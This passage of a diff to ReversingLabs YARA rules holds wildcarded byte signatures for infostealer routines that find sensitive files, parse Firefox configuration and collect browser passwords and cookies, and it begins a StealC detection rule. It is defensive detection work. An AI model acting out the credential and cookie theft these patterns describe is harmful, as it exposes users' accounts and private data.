+            ?? 49 3B 46 ?? 74 ?? 48 8D 55 ?? 48 8B C8 E8 ?? ?? ?? ?? 49 8B 5E ?? BA ?? ?? ?? ??
+            48 8D 4D ?? E8 ?? ?? ?? ?? 49 8B 0E 48 83 C1 ?? 48 8B 01 48 85 C0 74 ?? 48 39 58 ??
+            72 ?? 77 ?? 4C 89 20 48 8B 40 ?? 48 89 01 EB ?? 48 8D 48 ?? 48 8B 01 48 85 C0 75 ??
+            48 8D 4D ?? E8 ?? ?? ?? ?? 49 83 46 ?? ?? EB ?? 4C 8D 45 ?? 48 8B D0 49 8B CE E8 ??
+            ?? ?? ?? 90 48 8D 4D ?? E8 ?? ?? ?? ?? 4C 8B 45 ?? 49 83 F8 ?? 76 ?? 48 8B 55 ?? 48
+            8D 4D ?? E8 ?? ?? ?? ?? 4C 89 65 ?? 48 C7 45 ?? ?? ?? ?? ?? 66 44 89 65 ?? 48 8B 4D
+            ?? 4C 89 65 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 4C 8B
+            45 ?? 49 83 F8 ?? 76 ?? 48 8B 54 24 ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 4C 89 65 ?? 48
+            C7 45 ?? ?? ?? ?? ?? 66 44 89 64 24 ?? 48 8B 4C 24 ?? 4C 89 64 24 ?? BA ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 90 48 8D 4D ?? E8 ?? ?? ?? ?? 4C 8B 45 ?? 49 83 F8 ?? 76 ?? 48 8B 55
+            ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 4C 89 65 ?? 48 C7 45 ?? ?? ?? ?? ?? 66 44 89 65 ?? 48
+        }
+		$parse_firefox_configuration_p1 = {
+            48 89 5C 24 ?? 48 89 74 24 ?? 48 89 7C 24 ?? 55 41 54 41 55 41 56 41 57 48 8D AC 24
+            ?? ?? ?? ?? 48 81 EC ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 33 C4 48 89 85 ?? ?? ?? ??
+            48 8B F1 48 89 4C 24 ?? 45 33 ED 44 89 6C 24 ?? 0F 57 C0 0F 11 01 0F 11 41 ?? 4C 89
+            29 4C 89 69 ?? 4C 89 69 ?? 4C 89 69 ?? 41 8D 4D ?? E8 ?? ?? ?? ?? 4C 89 68 ?? 48 89
+            06 48 89 30 C7 44 24 ?? ?? ?? ?? ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 90 48 8D 4D ?? E8 ??
+            ?? ?? ?? 84 C0 0F 84 ?? ?? ?? ?? 4C 8B 75 ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 49 2B C6
+            48 83 F8 ?? 0F 82 ?? ?? ?? ?? 4C 8D 65 ?? 48 83 7D ?? ?? 4C 0F 47 65 ?? 4C 89 6C 24
+            ?? 0F 57 C0 0F 11 44 24 ?? 0F 57 C9 F3 0F 7F 4C 24 ?? 4D 8D 7E ?? 41 8D 5D ?? 48 8D
+            7C 24 ?? 48 8D 44 24 ?? 48 89 85 ?? ?? ?? ?? 8D 4B ?? E8 ?? ?? ?? ?? 48 89 85 ?? ??
+            ?? ?? 48 8D 4C 24 ?? 48 89 08 4C 89 68 ?? 48 89 44 24 ?? 8D 4B ?? 4C 3B FB 76 ?? 49
+            8B DF 48 83 CB ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 48 3B D8 76 ?? 48 8B D8 EB ?? 48 3B
+            D9 48 0F 42 D9 48 8D 4B ?? E8 ?? ?? ?? ?? 48 8B F8 48 89 44 24 ?? 4C 89 7C 24 ?? 48
+            89 5C 24 ?? 4D 8B C6 49 8B D4 48 8B CF E8 ?? ?? ?? ?? 8B 05 ?? ?? ?? ?? 66 42 89 04
+            37 0F B6 05 ?? ?? ?? ?? 42 88 44 37 ?? 42 C6 04 3F ?? C7 44 24 ?? ?? ?? ?? ?? 48 8D
+            54 24 ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 90 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 4C 8B 44 24 ??
+            49 83 F8 ?? 76 ?? 49 FF C0 48 8B 54 24 ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 66 0F 6F 05
+            ?? ?? 12 00 F3 0F 7F 44 24 ?? C6 44 24 ?? ?? 48 8B 4C 24 ?? 4C 89 6C 24 ?? BA ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 48 8D 55 ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 90 0F 57 C0 0F 11 45 ??
+            0F 11 45 ?? 48 8D 55 ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 90 48 8D 4D ?? E8 ?? ?? ?? ?? 90
+        }
+		$parse_firefox_configuration_p2 = {
+            4C 89 6C 24 ?? 0F 57 C0 0F 11 44 24 ?? 4C 89 6C 24 ?? 4C 89 6C 24 ?? 48 8B 7D ?? 4C
+            8D 75 ?? 48 83 7D ?? ?? 4C 0F 47 75 ?? 49 BC ?? ?? ?? ?? ?? ?? ?? ?? 49 3B FC 0F 87
+            ?? ?? ?? ?? 48 8D 44 24 ?? 48 89 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89
+            85 ?? ?? ?? ?? 48 8D 4C 24 ?? 48 89 08 4C 89 68 ?? 48 89 44 24 ?? 48 83 FF ?? 77 ??
+            48 89 7C 24 ?? BA ?? ?? ?? ?? 48 89 54 24 ?? 41 0F 10 06 0F 11 44 24 ?? EB ?? 48 8B
+            DF 48 83 CB ?? 49 3B DC 76 ?? 49 8B DC EB ?? 48 83 FB ?? B8 ?? ?? ?? ?? 48 0F 42 D8
+            48 8D 4B ?? E8 ?? ?? ?? ?? 48 89 44 24 ?? 48 89 7C 24 ?? 48 89 5C 24 ?? 4C 8D 47 ??
+            49 8B D6 48 8B C8 E8 ?? ?? ?? ?? 90 48 8B 54 24 ?? F2 0F 10 05 ?? ?? ?? ?? F2 0F 11
+            85 ?? ?? ?? ?? 0F B6 05 ?? ?? ?? ?? 88 85 ?? ?? ?? ?? 48 8D 4C 24 ?? 48 83 FA ?? 48
+            0F 47 4C 24 ?? FF 15 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8B D8 48
+            85 C0 75 ?? FF 15 ?? ?? ?? ?? 8B D0 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 4C 24
+            ?? E8 ?? ?? ?? ?? 4C 8B 44 24 ?? 49 83 F8 ?? 76 ?? 49 FF C0 48 8B 54 24 ?? 48 8D 4C
+            24 ?? E8 ?? ?? ?? ?? 4C 89 6C 24 ?? 48 C7 44 24 ?? ?? ?? ?? ?? C6 44 24 ?? ?? 48 8B
+            4C 24 ?? 4C 89 6C 24 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 85 DB 75 ?? 48 8D 15 ?? ??
+            ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8B CB FF 15 ?? ??
+            ?? ?? 48 89 05 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8B CB FF 15 ?? ?? ?? ?? 48 89 05
+            ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8B CB FF 15 ?? ?? ?? ?? 48 89 05 ?? ?? ?? ?? 48
+            8D 15 ?? ?? ?? ?? 48 8B CB FF 15 ?? ?? ?? ?? 48 89 05 ?? ?? ?? ?? 48 8D 15 ?? ?? ??
+            ?? 48 8B CB FF 15 ?? ?? ?? ?? 48 89 05 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8B CB FF
+            15 ?? ?? ?? ?? 48 89 05 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8B CB FF 15
+        }
+		$parse_firefox_configuration_p3 = {
+            4C 8B 7D ?? 49 8B C4 49 2B C7 48 83 F8 ?? 0F 82 ?? ?? ?? ?? 4C 8D 65 ?? 48 83 7D ??
+            ?? 4C 0F 47 65 ?? 4C 89 6C 24 ?? 0F 57 C0 0F 11 44 24 ?? 0F 57 C9 F3 0F 7F 4D ?? 4D
+            8D 77 ?? BB ?? ?? ?? ?? 48 8D 7C 24 ?? 48 8D 44 24 ?? 48 89 85 ?? ?? ?? ?? 8D 4B ??
+            E8 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 8D 4C 24 ?? 48 89 08 4C 89 68 ?? 48 89 44 24
+            ?? 4C 3B F3 76 ?? 49 8B DE 48 83 CB ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 48 3B D8 76 ??
+            48 8B D8 EB ?? 48 83 FB ?? B8 ?? ?? ?? ?? 48 0F 42 D8 48 8D 4B ?? E8 ?? ?? ?? ?? 48
+            8B F8 48 89 44 24 ?? 4C 89 75 ?? 48 89 5D ?? 4D 8B C7 49 8B D4 48 8B CF E8 ?? ?? ??
+            ?? 42 C7 04 3F ?? ?? ?? ?? 42 C6 04 37 ?? C7 44 24 ?? ?? ?? ?? ?? 48 8B 05 ?? ?? ??
+            ?? 48 8D 4C 24 ?? 48 83 7D ?? ?? 48 0F 47 4C 24 ?? FF D0 4C 8B 75 ?? 48 8B 5D ?? 49
+            3B DE 0F 84 ?? ?? ?? ?? 48 83 C3 ?? 0F 1F 40 ?? 48 8D 43 ?? 48 8D 4D ?? 48 3B C8 74
+            ?? 48 8B D3 48 83 7B ?? ?? 76 ?? 48 8B 13 4C 8B 43 ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 48
+            8D 53 ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ??
+            ?? 49 C7 C0 ?? ?? ?? ?? 0F 1F 40 ?? 49 FF C0 42 80 3C 00 ?? 75 ?? 48 8B D0 48 8D 4D
+            ?? E8 ?? ?? ?? ?? 48 8D 53 ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ??
+            48 8B C8 E8 ?? ?? ?? ?? 49 C7 C0 ?? ?? ?? ?? 0F 1F 44 00 ?? 49 FF C0 42 80 3C 00 ??
+            75 ?? 48 8B D0 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 7E ?? 48 3B 7E ?? 74 ?? 48
+            89 BD ?? ?? ?? ?? 48 8D 55 ?? 48 8B CF E8 ?? ?? ?? ?? 90 48 8D 4F ?? 48 8D 55 ?? E8
+            ?? ?? ?? ?? 90 48 8D 4F ?? 48 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8B 56 ?? 4C 8B
+            C2 48 8B CE E8 ?? ?? ?? ?? 48 83 46 ?? ?? EB ?? 4C 8D 45 ?? 48 8B D7 48 8B CE E8 ??
+            ?? ?? ?? 48 83 C3 ?? 48 8D 43 ?? 49 3B C6 0F 85 ?? ?? ?? ?? 48 8D 4C 24
+        }
+		$collect_browser_passwords_p1 = {
+            48 89 5C 24 ?? 55 56 57 41 54 41 55 41 56 41 57 48 8D AC 24 ?? ?? ?? ?? 48 81 EC ??
+            ?? ?? ?? 0F 29 B4 24 ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 33 C4 48 89 85 ?? ?? ?? ??
+            48 63 DA 48 8B F9 48 89 4D ?? C7 44 24 ?? ?? ?? ?? ?? 0F 57 C0 0F 11 01 0F 11 41 ??
+            45 33 ED 4C 89 29 4C 89 69 ?? 4C 89 69 ?? 4C 89 69 ?? 41 8D 4D ?? E8 ?? ?? ?? ?? 4C
+            89 68 ?? 48 89 07 48 89 38 C7 44 24 ?? ?? ?? ?? ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 90 48
+            8D 0C 9B 4C 8D 05 ?? ?? ?? ?? 49 8D 50 ?? 48 8D 14 CA 49 83 7C C8 ?? ?? 76 ?? 48 8B
+            12 4D 8B 44 C8 ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8B D0 48 8D 4D ?? E8 ?? ?? ?? ?? C7 44
+            24 ?? ?? ?? ?? ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 4C 8B 45 ?? 49 83 F8 ?? 76 ?? 49 FF C0
+            48 8B 55 ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 66 0F 6F 05 ?? ?? 12 00 F3 0F 7F 45 ?? C6 45
+            ?? ?? 48 8B 4D ?? 4C 89 6D ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 4D ?? E8 ?? ??
+            ?? ?? 84 C0 0F 84 ?? ?? ?? ?? 48 8D 55 ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 90 8B CB E8 ??
+            ?? ?? ?? 4C 8B E0 4C 89 6D ?? 4C 89 6D ?? 0F 57 C0 0F 11 45 ?? 0F 57 C9 F3 0F 7F 4D
+            ?? 41 B8 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 90 4C 89 6D ??
+            48 8D 4D ?? 48 83 7D ?? ?? 48 0F 47 4D ?? 48 8D 55 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ??
+            48 8D 15 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B D8 48 8B 4D ?? FF 15
+            ?? ?? ?? ?? 48 8B D0 48 8B CB E8 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? E9 ?? ?? ?? ??
+            48 8D 55 ?? 48 83 7D ?? ?? 48 0F 47 55 ?? 4C 89 6C 24 ?? 4C 8D 4D ?? 41 B8 ?? ?? ??
+            ?? 48 8B 4D ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 48 8D 15 ?? ?? ?? ?? EB ?? 48 8B 4D ??
+            FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 66 0F 1F 84 00 ?? ?? 00 00 33 D2 48 8B
+            4D ?? FF 15 ?? ?? ?? ?? 4C 8B F8 BA ?? ?? ?? ?? 48 8B 4D ?? FF 15 ?? ?? ?? ?? 48 8B
+        }
+		$collect_browser_passwords_p2 = {
+            F0 BA ?? ?? ?? ?? 48 8B 4D ?? FF 15 ?? ?? ?? ?? 4C 8B F0 BA ?? ?? ?? ?? 48 8B 4D ??
+            FF 15 ?? ?? ?? ?? 48 8B D8 BA ?? ?? ?? ?? 48 8B 4D ?? FF 15 ?? ?? ?? ?? BA ?? ?? ??
+            ?? 48 8B 4D ?? FF 15 ?? ?? ?? ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 90 48 C7 C0 ?? ?? ?? ??
+            48 FF C0 80 3C 03 ?? 75 ?? 48 83 F8 ?? 0F 86 ?? ?? ?? ?? 41 0F 10 34 24 4C 89 6C 24
+            ?? 0F 57 C0 0F 11 44 24 ?? 4C 89 6C 24 ?? 4C 89 6C 24 ?? 49 C7 C0 ?? ?? ?? ?? 66 0F
+            1F 44 00 ?? 49 FF C0 42 80 3C 03 ?? 75 ?? 48 8B D3 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 0F
+            29 74 24 ?? 4C 8D 44 24 ?? 48 8D 54 24 ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 90 48 8D 15 ??
+            ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B C8 49 8B D7 E8 ?? ?? ?? ?? 48 8B
+            C8 E8 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B C8
+            48 8B D6 E8 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D 0D ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 48 8B C8 49 8B D6 E8 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8D
+            15 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 55 ?? 48 83 7D ?? ?? 48 0F
+            47 55 ?? 4C 8B 45 ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8B C8 E8 ??
+            ?? ?? ?? 49 C7 C0 ?? ?? ?? ?? 49 FF C0 42 80 3C 06 ?? 75 ?? 48 8B D6 48 8D 4D ?? E8
+            ?? ?? ?? ?? 49 C7 C0 ?? ?? ?? ?? 49 FF C0 43 80 3C 06 ?? 75 ?? 49 8B D6 48 8D 4D ??
+            E8 ?? ?? ?? ?? 48 8D 55 ?? 48 83 7D ?? ?? 48 0F 47 55 ?? 4C 8B 45 ?? 48 8D 8D ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 48 8B 5F ?? 48 3B 5F ?? 74 ?? 48 89 5C 24 ?? 48 8D 55 ?? 48 8B
+        }
+		$collect_browser_passwords_p3 = {
+            CB E8 ?? ?? ?? ?? 90 48 8D 4B ?? 48 8D 55 ?? E8 ?? ?? ?? ?? 90 48 8D 4B ?? 48 8D 95
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8B 57 ?? 4C 8B C2 48 8B CF E8 ?? ?? ?? ?? 48 83 47
+            ?? ?? EB ?? 4C 8D 45 ?? 48 8B D3 48 8B CF E8 ?? ?? ?? ?? 90 48 8D 4D ?? E8 ?? ?? ??
+            ?? 4C 8B 45 ?? 49 83 F8 ?? 76 ?? 49 FF C0 48 8B 55 ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 4C
+            89 6D ?? 48 C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 48 8B 4D ?? 4C 89 6D ?? BA ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 90 48 8D 4D ?? E8 ?? ?? ?? ?? 48 8B 4D ?? FF 15 ?? ?? ?? ?? 83 F8 ??
+            0F 84 ?? ?? ?? ?? 48 8B 4D ?? FF 15 ?? ?? ?? ?? BA ?? ?? ?? ?? 49 8B CC E8 ?? ?? ??
+            ?? 90 48 8D 4D ?? E8 ?? ?? ?? ?? 4C 8B 45 ?? 49 83 F8 ?? 76 ?? 49 FF C0 48 8B 55 ??
+            48 8D 4D ?? E8 ?? ?? ?? ?? 66 0F 6F 05 ?? ?? 12 00 48 8B 4D ?? F3 0F 7F 45 ?? C6 45
+            ?? ?? 4C 89 6D ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 4D ?? E8 ?? ?? ?? ?? 4C 8B
+            45 ?? 49 83 F8 ?? 76 ?? 49 FF C0 48 8B 55 ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 66 0F 6F 05
+            ?? ?? 12 00 48 8B 4D ?? F3 0F 7F 45 ?? C6 45 ?? ?? 4C 89 6D ?? BA ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 90 48 8D 4D ?? E8 ?? ?? ?? ?? 4C 8B 45 ?? 49 83 F8 ?? 76 ?? 49 FF C0 48 8B
+            55 ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 66 0F 6F 05 ?? ?? 12 00 48 8B 4D ?? F3 0F 7F 45 ??
+            C6 45 ?? ?? 4C 89 6D ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8B C7 48 8B 8D ?? ?? ??
+            ?? 48 33 CC E8 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 0F 28 B4 24 ?? ?? ?? ?? 48 81 C4
+            ?? ?? ?? ?? 41 5F 41 5E 41 5D 41 5C 5F 5E 5D C3
+        }
+		$collect_cookies_p1 = {
+            48 89 5C 24 ?? 55 56 57 41 54 41 55 41 56 41 57 48 8D AC 24 ?? ?? ?? ?? 48 81 EC ??
+            ?? ?? ?? 0F 29 B4 24 ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 33 C4 48 89 85 ?? ?? ?? ??
+            48 63 DA 4C 8B F1 48 89 4D ?? C7 44 24 ?? ?? ?? ?? ?? 0F 57 C0 0F 11 01 0F 11 41 ??
+            33 FF 48 89 39 48 89 79 ?? 48 89 79 ?? 48 89 79 ?? 8D 4F ?? E8 ?? ?? ?? ?? 48 89 78
+            ?? 49 89 06 4C 89 30 C7 44 24 ?? ?? ?? ?? ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 90 48 8D 0C
+            9B 4C 8D 05 ?? ?? ?? ?? 49 8D 50 ?? 48 8D 14 CA 49 83 7C C8 ?? ?? 76 ?? 48 8B 12 4D
+            8B 44 C8 ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8B D0 48 8D 4D ?? E8 ?? ?? ?? ?? C7 44 24 ??
+            ?? ?? ?? ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 4C 8B 45 ?? 49 83 F8 ?? 76 ?? 49 FF C0 48 8B
+            55 ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 66 0F 6F 05 ?? ?? 12 00 F3 0F 7F 45 ?? C6 45 ?? ??
+            48 8B 4D ?? 48 89 7D ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 4D ?? E8 ?? ?? ?? ??
+            84 C0 0F 84 ?? ?? ?? ?? 8B CB E8 ?? ?? ?? ?? 48 89 44 24 ?? 48 89 7D ?? 48 89 7D ??
+            0F 57 C0 0F 11 45 ?? 0F 57 C9 F3 0F 7F 4D ?? 41 B8 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ??
+            48 8D 4D ?? E8 ?? ?? ?? ?? 90 48 89 7D ?? 48 8D 4D ?? 48 83 7D ?? ?? 48 0F 47 4D ??
+            48 8D 55 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 48 8D 15 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 48 8B D8 48 8B 4D ?? FF 15 ?? ?? ?? ?? 48 8B D0 48 8B CB E8 ?? ?? ??
+            ?? 48 8B C8 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8D 55 ?? 48 83 7D ?? ?? 48 0F 47 55 ??
+            48 89 7C 24 ?? 4C 8D 4D ?? 41 B8 ?? ?? ?? ?? 48 8B 4D ?? FF 15 ?? ?? ?? ?? 85 C0 74
+            ?? 48 8D 15 ?? ?? ?? ?? EB ?? 48 8B 4D ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? ??
+            ?? 0F 1F 80 ?? ?? ?? ?? 33 D2 48 8B 4D ?? FF 15 ?? ?? ?? ?? 48 8B F0 BA ?? ?? ?? ??
+            48 8B 4D ?? FF 15 ?? ?? ?? ?? 48 8B F8 BA ?? ?? ?? ?? 48 8B 4D ?? FF 15
+        }
+		$collect_cookies_p2 = {
+            4C 8B F8 BA ?? ?? ?? ?? 48 8B 4D ?? FF 15 ?? ?? ?? ?? 48 8B D8 BA ?? ?? ?? ?? 48 8B
+            4D ?? FF 15 ?? ?? ?? ?? 4C 8B E0 BA ?? ?? ?? ?? 48 8B 4D ?? FF 15 ?? ?? ?? ?? 44 8B
+            E8 48 85 F6 75 ?? 48 85 FF 75 ?? 48 85 DB 0F 84 ?? ?? ?? ?? 48 C7 C1 ?? ?? ?? ?? 48
+            FF C1 80 3C 0E ?? 75 ?? 48 85 C9 75 ?? 48 C7 C0 ?? ?? ?? ?? 0F 1F 84 00 ?? ?? ?? ??
+            48 FF C0 80 3C 07 ?? 75 ?? 48 85 C0 75 ?? 48 C7 C0 ?? ?? ?? ?? 48 FF C0 80 3C 03 ??
+            75 ?? 48 85 C0 0F 84 ?? ?? ?? ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 90 45 85 ED 0F 8E ?? ??
+            ?? ?? 48 C7 C0 ?? ?? ?? ?? 48 FF C0 80 3C 03 ?? 75 ?? 48 83 F8 ?? 0F 86 ?? ?? ?? ??
+            48 8D 15 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B C8 48 8B D6 E8 ?? ??
+            ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 48 8B C8 48 8B D7 E8 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8B 44 24 ?? 0F 10 30
+            45 33 ED 4C 89 6C 24 ?? 0F 57 C0 0F 11 44 24 ?? 4C 89 6C 24 ?? 4C 89 6C 24 ?? 49 C7
+            C0 ?? ?? ?? ?? 0F 1F 80 ?? ?? ?? ?? 49 FF C0 46 38 2C 03 75 ?? 48 8B D3 48 8D 4C 24
+            ?? E8 ?? ?? ?? ?? 0F 29 74 24 ?? 4C 8D 44 24 ?? 48 8D 54 24 ?? 48 8D 4D ?? E8 ?? ??
+            ?? ?? 90 48 8D 15 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 55 ?? 48 83
+            7D ?? ?? 48 0F 47 55 ?? 4C 8B 45 ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ??
+            48 8D 15 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B C8 49 8B D7 E8 ?? ??
+            ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 48 8B C8 49 8B D4 E8 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8B C8 E8
+        }
+		$collect_cookies_p3 = {
+            49 C7 C0 ?? ?? ?? ?? 90 49 FF C0 42 80 3C 06 ?? 75 ?? 48 8B D6 48 8D 4D ?? E8 ?? ??
+            ?? ?? 49 C7 C0 ?? ?? ?? ?? 0F 1F 00 49 FF C0 42 80 3C 07 ?? 75 ?? 48 8B D7 48 8D 4D
+            ?? E8 ?? ?? ?? ?? 49 C7 C0 ?? ?? ?? ?? 0F 1F 00 49 FF C0 43 80 3C 07 ?? 75 ?? 49 8B
+            D7 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 49 C7 C0 ?? ?? ?? ?? 49 FF C0 43 80 3C 04 ??
+            75 ?? 49 8B D4 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 55 ?? 48 83 7D ?? ?? 48 0F
+            47 55 ?? 4C 8B 45 ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 49 8B 56 ?? 4C 8D 45 ?? 49 3B 56 ??
+            74 ?? E8 ?? ?? ?? ?? 49 8B 56 ?? 4C 8B C2 49 8B CE E8 ?? ?? ?? ?? 49 81 46 ?? ?? ??
+            ?? ?? EB ?? 49 8B CE E8 ?? ?? ?? ?? 90 48 8D 4D ?? E8 ?? ?? ?? ?? 4C 8B 45 ?? 49 83
+            F8 ?? 76 ?? 49 FF C0 48 8B 55 ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 4C 89 6D ?? 48 C7 45 ??
+            ?? ?? ?? ?? C6 45 ?? ?? 48 8B 4D ?? 4C 89 6D ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48
+            8D 4D ?? E8 ?? ?? ?? ?? 48 8B 4D ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 33
+            FF 48 8D 4D ?? E8 ?? ?? ?? ?? 4C 8B 45 ?? 49 83 F8 ?? 76 ?? 49 FF C0 48 8B 55 ?? 48
+            8D 4D ?? E8 ?? ?? ?? ?? 66 0F 6F 05 ?? ?? 12 00 48 8B 4D ?? F3 0F 7F 45 ?? C6 45 ??
+            ?? 48 89 7D ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 4D ?? E8 ?? ?? ?? ?? 4C 8B 45
+            ?? 49 83 F8 ?? 76 ?? 49 FF C0 48 8B 55 ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 66 0F 6F 05 ??
+            ?? 12 00 48 8B 4D ?? F3 0F 7F 45 ?? C6 45 ?? ?? 48 89 7D ?? BA ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 90 49 8B C6 48 8B 8D ?? ?? ?? ?? 48 33 CC E8 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ??
+            ?? 0F 28 B4 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? 41 5F 41 5E 41 5D 41 5C 5F 5E 5D C3
         }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $mocket_body_1 at pe.entry_point ) and $mocket_body_2 and $mocket_body_3
+		uint16( 0 ) == 0x5A4D and ( ( $network_communication ) and ( all of ( $find_sensitive_files_p* ) ) and ( all of ( $parse_firefox_configuration_p* ) ) and ( all of ( $collect_browser_passwords_p* ) ) and ( all of ( $collect_cookies_p* ) ) )
 }
-
-rule REVERSINGLABS_Win32_Virus_Greenp : TC_DETECTION MALICIOUS MALWARE FILE
+rule REVERSINGLABS_Win32_Infostealer_Stealc : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Yara rule that detects Greenp virus."
+		description = "Yara rule that detects StealC infostealer."
 		author = "ReversingLabs"
-		id = "5751e91c-652b-59bd-93b8-ece677ad4911"
-		date = "2020-07-15"
-		modified = "2020-07-15"
+		id = "b53bbf15-3e94-513c-91a9-83dda421063b"
+		date = "2023-06-07"
+		modified = "2023-06-07"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/virus/Win32.Virus.Greenp.yara#L3-L46"
